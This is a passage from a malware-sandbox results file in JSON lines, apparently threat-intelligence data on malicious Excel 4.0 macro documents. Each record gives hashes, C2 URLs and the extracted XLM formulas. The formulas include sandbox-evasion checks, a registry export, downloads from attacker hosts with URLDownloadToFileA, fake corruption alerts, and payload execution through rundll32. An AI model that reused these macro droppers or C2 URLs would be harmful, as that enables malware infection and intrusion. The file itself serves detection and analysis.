255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wfQgNenkhT\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f54ec9ab451b25cfab8ab9e18f7540e89886905d398fa00ef6c844632e625cf"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f54ec9ab451b25cfab8ab9e18f7540e89886905d398fa00ef6c844632e625cf","filesize":185344,"md5":"ef66bd20dc42ad7e2ec7d4b299c95fa4","sha1":"e8106dd5c26ab9ef9b5644589380baa55d9cbde1","sha256":"6f54ec9ab451b25cfab8ab9e18f7540e89886905d398fa00ef6c844632e625cf","sha512":"1158ca131e05e0c98fa1475b0836912aa56d2da0ff0e63772fae0b78c152b4676f05169d33f0c1fa7ae1ce1c18b5aef7c26a581a4586ee3ac4eefea4ab417393","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f54ec9ab451b25cfab8ab9e18f7540e89886905d398fa00ef6c844632e625cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f6cc2612412a786dfa26ccea2146be9f0b27c3137f078b707e5ac77b0acc9cc"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f6cc2612412a786dfa26ccea2146be9f0b27c3137f078b707e5ac77b0acc9cc","filesize":185344,"md5":"b9a1c6b3e0e5633f967dc4de010071e2","sha1":"8b229c2dd1fc004581e923234296f5fdfdbd15cf","sha256":"6f6cc2612412a786dfa26ccea2146be9f0b27c3137f078b707e5ac77b0acc9cc","sha512":"e85018e6381f65214a1d40c5fb15ec0cd4f785092d9cb2be92d9656a0bc9c72adadc6e7f0cdf1ee780e8d589ad6c91b8682a8352ebb8ec6694ea39f0f8e4702e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f6cc2612412a786dfa26ccea2146be9f0b27c3137f078b707e5ac77b0acc9cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f6e29cc9ada303e05df673f55a57355b26cdcafb93d92dc4c8478869aad097f"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f6e29cc9ada303e05df673f55a57355b26cdcafb93d92dc4c8478869aad097f","filesize":168960,"md5":"1b9e58f2c07a370cc9d6af28336e35db","sha1":"7dc6f78aac2c6879b3e4cfc21f82c003be6054b6","sha256":"6f6e29cc9ada303e05df673f55a57355b26cdcafb93d92dc4c8478869aad097f","sha512":"df0ac6a78911ba76e53f5e6a76fa5a485964c4627c66e9bf2c1b8558ccd23bef9e1218604d0cc2655f94dda8a3886077415289057ed2c632e2964c0778190ba8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f6e29cc9ada303e05df673f55a57355b26cdcafb93d92dc4c8478869aad097f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1qxjBvQ7Wp\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f7b2873b6e483edf9a4ee61d498935da264d110e75868ea9e342cf90115103f"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f7b2873b6e483edf9a4ee61d498935da264d110e75868ea9e342cf90115103f","filesize":209920,"md5":"0babd1f0cf8f29f4f83de5b2f8d68383","sha1":"0843988171b4a3b30d78f6e2a4592daf845242ac","sha256":"6f7b2873b6e483edf9a4ee61d498935da264d110e75868ea9e342cf90115103f","sha512":"38f9c6e2d3e8b07e514097b83f5bc09cdeab11905d45ae3e2f0fb29db817ab01b65440bdce2065c8771035767ad0fe09fe9c138c97f969d628eb8b162dbfe029","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f7b2873b6e483edf9a4ee61d498935da264d110e75868ea9e342cf90115103f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"J3nGSJcKz1\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6fa57cbe069c7cc2d4eb2fea1b245201ddd166385c9e22483d9a93a632ae43da"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6fa57cbe069c7cc2d4eb2fea1b245201ddd166385c9e22483d9a93a632ae43da","filesize":185344,"md5":"f2b60e4f3aec23ad0bc51f24f1975df5","sha1":"f2e76bd2907d0b3be9a8b519bc82b7da41532c77","sha256":"6fa57cbe069c7cc2d4eb2fea1b245201ddd166385c9e22483d9a93a632ae43da","sha512":"7384b72af5699c9cba5236bbf096fcd33b1b95b0660e838309ef2ac48dcdd41d4553cc6ad88cdcb25deb08223602a2c58a63df8fcb7a07e0c9c500bd9cd1d624","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6fa57cbe069c7cc2d4eb2fea1b245201ddd166385c9e22483d9a93a632ae43da.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6fb4118fba7d75711daa480228c24410a9b41fad699f32cef4d6a7862dc16a88"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6fb4118fba7d75711daa480228c24410a9b41fad699f32cef4d6a7862dc16a88","filesize":147968,"md5":"8762e47d6ad6402c61a86722ba8faad6","sha1":"301cc9914ef24a425e1750e03883c17c99a331d8","sha256":"6fb4118fba7d75711daa480228c24410a9b41fad699f32cef4d6a7862dc16a88","sha512":"4afd840d995178780ea2631bf3e48106d17cc190e434893ba6383b3e152b044b6486251333415c28075ae26f1b8963046584fd37593e7e4cc6ce9ea0eb92428c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6fb4118fba7d75711daa480228c24410a9b41fad699f32cef4d6a7862dc16a88.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"tS4slGd2rp\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6fdd01c39f543cee9c933151b2704947a236fdb2a5ec85e865932454469a4842"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6fdd01c39f543cee9c933151b2704947a236fdb2a5ec85e865932454469a4842","filesize":168448,"md5":"aeb3151b1dadf71689423ec75f5e90eb","sha1":"14ecdb20a7a510e24c5ab5e26acff723862e144a","sha256":"6fdd01c39f543cee9c933151b2704947a236fdb2a5ec85e865932454469a4842","sha512":"b8a7871691c596d9e8c813772e7ad734328985bbb415b0d9014b9f11e76b0892939e9f5305c9db243b401776fb1e1d5905348e1c70ba4abd9361e2bd29770fc0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6fdd01c39f543cee9c933151b2704947a236fdb2a5ec85e865932454469a4842.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"d2g2anonPz\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6fde25c40ea88a0075bdb34407c306aa1ff43fdcd8cce414317ec6a6c39de3a9"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6fde25c40ea88a0075bdb34407c306aa1ff43fdcd8cce414317ec6a6c39de3a9","filesize":219136,"md5":"643c54a6774674c365f5baa313dcf62d","sha1":"d32fabd1ecbbdc371b4e605f40626dbe4335a2ea","sha256":"6fde25c40ea88a0075bdb34407c306aa1ff43fdcd8cce414317ec6a6c39de3a9","sha512":"300abbd6fe3c1a3409e156ff9291c8c3253706141c64e1e078e64d820ed7a678a3a4ce88e36e60e8fa784755cf7a846f4d4b9457903b10cb4858317238f7f9b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6fde25c40ea88a0075bdb34407c306aa1ff43fdcd8cce414317ec6a6c39de3a9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"irho7b1lox\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6fe3c9766db2d56312810312a8b2e753b514505e5e4ffb4865c574610a21349b"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6fe3c9766db2d56312810312a8b2e753b514505e5e4ffb4865c574610a21349b","filesize":145920,"md5":"3e11f5237b52529aace8983f4070073a","sha1":"f44302006ae288bfb95bff78b74ed14cc908a5ef","sha256":"6fe3c9766db2d56312810312a8b2e753b514505e5e4ffb4865c574610a21349b","sha512":"f803cd4b815e4d7cfaa82828099ca3025c8ef828a3d4ca2e68f7b9cc97ae96247a45af9677f02f36b57022504f5101bd402bcb0ae339f9359405f46858203c7b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6fe3c9766db2d56312810312a8b2e753b514505e5e4ffb4865c574610a21349b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"f7O6rW72ZS\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6fefe92c3efa52730a697dc752105a10d23800281e7fcd3750a4150a3102958b"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6fefe92c3efa52730a697dc752105a10d23800281e7fcd3750a4150a3102958b","filesize":141824,"md5":"e0ee5ce9575e1e95c76c314cee8f8ec4","sha1":"7c5aa1a5c0e774c830112faded14c3c8923373b2","sha256":"6fefe92c3efa52730a697dc752105a10d23800281e7fcd3750a4150a3102958b","sha512":"f8d5cf5ee8e6a059bb0f60e56445fc0bd2cb27950a5e9c512fc9427903efb51042b095dd9c3152c8779ff86615831e72938f03b2ca41a410409124ed099a5932","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6fefe92c3efa52730a697dc752105a10d23800281e7fcd3750a4150a3102958b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"rYa5sW2x0N\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7023f0b433ea788f4bc2638259769a2bec845339a22fb82d08b4886ff89a649d"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"7023f0b433ea788f4bc2638259769a2bec845339a22fb82d08b4886ff89a649d","filesize":170496,"md5":"82fa75c6e70c407025624c5dc493fde3","sha1":"6eebdb7a2bf426eef8a7a4097bb82cd002ea2675","sha256":"7023f0b433ea788f4bc2638259769a2bec845339a22fb82d08b4886ff89a649d","sha512":"e4c1eb16baadf637209fa641b9bc81ee619b25691c476d3104564b3d6637458d09c602d13f60f43c21a6e55d8c3deb5427026aa22ddafd628b0e5c599f72ba56","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7023f0b433ea788f4bc2638259769a2bec845339a22fb82d08b4886ff89a649d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"emrFV01sIJ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"70254175c1398cc1c0bf09f23c65a85c5166de7f46ef9c59e504b4ec16c7811d"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"70254175c1398cc1c0bf09f23c65a85c5166de7f46ef9c59e504b4ec16c7811d","filesize":210432,"md5":"e9d026606804a4d646a3ee0d60f93006","sha1":"d5c41dab72835e83200fd1542d2d6992b0c1058c","sha256":"70254175c1398cc1c0bf09f23c65a85c5166de7f46ef9c59e504b4ec16c7811d","sha512":"1ef48da8531717606eccff30b14deb2d0f96925a743728e8512df7d4e6af1c65e9bd4fbe9cda4c1aa332a6b17ebed4d25dcd15dc6f029d734348e6eb4c420008","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"70254175c1398cc1c0bf09f23c65a85c5166de7f46ef9c59e504b4ec16c7811d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-frunt.php","https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-frunt.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://gartnerkvartalet.no/wp-content/themes/calliope/wp-front.php\",\"c:\\Users\\Public\\c6wga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6wga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KvDsWI52aq\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"702daffaff52e49e738537cd85515fa404c25e6bd05ec044d343307fc779cf50"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"702daffaff52e49e738537cd85515fa404c25e6bd05ec044d343307fc779cf50","filesize":113664,"md5":"c1394e8743f0d8e59a4c7123e6cd5298","sha1":"4bd4d87bbefea4adcb7611399037411107fa5e17","sha256":"702daffaff52e49e738537cd85515fa404c25e6bd05ec044d343307fc779cf50","sha512":"1bd06f03eca45b0761689661a90c9338c884b8aae571487968ed7b06c7002ccb7bf64b7729f92cbf4e98a63d9e2b9e7f0a5570d0d2109076af56a89e9913ac13","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"702daffaff52e49e738537cd85515fa404c25e6bd05ec044d343307fc779cf50.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GE1aUZ8vhX\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7060a420a5f5bc9e121106efc9eadeba8668146618fd6dc4cbffdaf0f2f79c7c"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"7060a420a5f5bc9e121106efc9eadeba8668146618fd6dc4cbffdaf0f2f79c7c","filesize":209408,"md5":"361ae5fa653abf31d2bb1f53c91778e0","sha1":"35eab11744c955c15602162b3a9ed48356c86be0","sha256":"7060a420a5f5bc9e121106efc9eadeba8668146618fd6dc4cbffdaf0f2f79c7c","sha512":"e1a4edaad210e5970973bdf44e71abbecf263ede68e3d4d4f6115bee3429dc8cade648eb816436c5a4f7039e3516686e3bc78a1f51fea0e40ce16f718acfbf27","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7060a420a5f5bc9e121106efc9eadeba8668146618fd6dc4cbffdaf0f2f79c7c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tKX9E31GXy\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"707c28ddcd0137894e260cb06c178a9a08030a00ba4c6d9833225a77f905bab5"},"analysis":{"reported":"2020-04-09T16:16:59Z","score":10},"files":[{"filename":"707c28ddcd0137894e260cb06c178a9a08030a00ba4c6d9833225a77f905bab5","filesize":167936,"md5":"4c95c941cce8a964df35b035b72fd2fe","sha1":"3aad6cc69c1beb2690924a8e63bd13cb79aa4f33","sha256":"707c28ddcd0137894e260cb06c178a9a08030a00ba4c6d9833225a77f905bab5","sha512":"e2938e7e3236ebf26c1f8c19339c50f44fe20268f48469f75cddc330dd0fd21cbd3538663356bdfdbf95da8d3e173ad3165c109804e30d5d044cbfca623dce22","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"707c28ddcd0137894e260cb06c178a9a08030a00ba4c6d9833225a77f905bab5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KHTenu2U0u\",TRUE)\nGOTO(R$0C$19)"}}}]}
